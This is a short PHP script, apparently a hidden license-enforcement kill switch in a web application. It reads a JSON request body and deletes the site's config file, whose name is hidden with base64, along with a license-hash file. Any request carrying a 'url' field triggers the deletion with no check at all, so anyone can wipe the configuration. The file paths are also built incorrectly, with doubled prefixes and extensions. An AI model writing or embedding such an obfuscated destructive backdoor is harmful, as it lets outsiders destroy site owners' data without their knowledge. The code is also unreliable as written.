<?php
include "../config.php";
$arr = json_decode(file_get_contents("php://input"));
$lis = $arr->lis;
$url = $arr->url;
IF(!empty($lis)){
    IF($lis==$lisensi){
        $u = base64_decode('Y29uZmln');
        $u = '../'.$u.'.php';
        unlink("../".$u.".php");
        unlink("../".md5($lisensi).".php");
        //rename($u , 'x'.$u);
    }
}    
IF(!empty($url)){
    $u = base64_decode('Y29uZmln');
    $u = '../'.$u.'.php';
    unlink("../".$u.".php");
    unlink("../".md5($lisensi).".php");
    //rename($u , 'x'.$u);
}
?>